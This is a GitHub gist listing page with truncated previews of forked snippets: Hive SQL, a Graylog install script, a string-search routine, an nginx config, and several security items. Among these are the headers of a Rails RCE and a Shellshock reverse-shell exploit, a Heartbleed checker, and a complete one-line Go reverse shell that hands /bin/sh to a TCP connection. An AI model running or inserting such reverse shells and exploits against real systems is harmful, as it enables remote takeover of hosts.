loveshell’s gists

loveshell / rails_rce.rb

Created January 11, 2013 10:03 — forked from postmodern/rails_rce.rb

	#!/usr/bin/env ruby
	#
	# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
	#
	# ## Advisory
	#
	# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
	#
	# ## Caveats
	#

loveshell / install_graylog.sh

Created January 21, 2013 15:55 — forked from ctavan/install_graylog.sh

	#!/bin/bash

	# WARNING: Don't use this in production since all passwords are kept at their default.

	# mongodb
	apt-key adv --keyserver keyserver.ubuntu.com --recv 7F0CEB10
	echo -e "deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen\n" > /etc/apt/sources.list.d/mongodb-10gen.list
	apt-get update
	apt-get install -y mongodb-10gen

loveshell / hive_prep.sql

Created February 11, 2013 17:49 — forked from patmcdonough/hive_prep.sql

	create table dimension_rollup_periods
	(period_id string, time_id string, begin_time timestamp, end_time timestamp)
	STORED AS TEXTFILE;

	/Run make_periods.sh script/

	alter table dimension_rollup_periods set serdeproperties ('field.delim'=',');

	LOAD DATA LOCAL INPATH 'periods/2012' OVERWRITE INTO TABLE dimension_rollup_periods;

loveshell / apache-logs-hive.sql

Created February 11, 2013 17:59 — forked from emk/apache-logs-hive.sql

	-- This is a Hive program. Hive is an SQL-like language that compiles
	-- into Hadoop Map/Reduce jobs. It's very popular among analysts at
	-- Facebook, because it allows them to query enormous Hadoop data
	-- stores using a language much like SQL.

	-- Our logs are stored on the Hadoop Distributed File System, in the
	-- directory /logs/randomhacks.net/access. They're ordinary Apache
	-- logs in *.gz format.
	--
	-- We want to pretend that these gzipped log files are a database table,

loveshell / xssdetect.js

Created November 4, 2013 09:26 — forked from koto/xssdetect.js

	var page = require('webpage').create(),
	system = require('system'),
	address;

	page.onInitialized = function () {
	page.evaluate(function () {
	// additional detection code here perhaps
	// f.e. detecting STORED/DOM XSS

	});

loveshell / csrf-lua.conf

Created November 15, 2013 08:23 — forked from shrikeh/csrf-lua.conf


	server {
	listen 80;
	root /root/to/your/docroot;

	proxy_redirect off;
	proxy_intercept_errors on;
	proxy_set_header Host $host;
	proxy_set_header X-Real-IP $remote_addr;
	proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

loveshell / shell.go

Created April 8, 2014 13:22 — forked from takeshixx/shell.go

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go

loveshell / openssl-heartbleed-server.py

Created April 10, 2014 15:47 — forked from thomaspatzke/openssl-heartbleed-server.py

	#!/usr/bin/python3
	# openssl-heartbleed-server.py
	# Check TLS clients for OpenSSL Heartbleed vulnerability.

	import socketserver
	import struct
	import random


	class HeartbleedServer(socketserver.BaseRequestHandler):

loveshell / BoyerMooreStringSearch.py

Created July 27, 2014 02:26 — forked from ameerkat/BoyerMooreStringSearch.py

	# Boyer Moore String Search implementation in Python
	# Ameer Ayoub <[email protected]>

	# Generate the Bad Character Skip List
	def generateBadCharShift(term):
	skipList = {}
	for i in range(0, len(term)-1):
	skipList[term[i]] = len(term)-i-1
	return skipList

loveshell / cve-2014-6271.py

Last active August 29, 2015 14:06 — forked from infoslack/cve-2014-6271.py

	# CVE-2014-6271 cgi-bin reverse shell
	# Original: http://pastebin.com/raw.php?i=166f8Rjx

	import httplib,urllib,sys
	if (len(sys.argv)<3):
	print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
	exit(0)

	conn = httplib.HTTPConnection(sys.argv[1])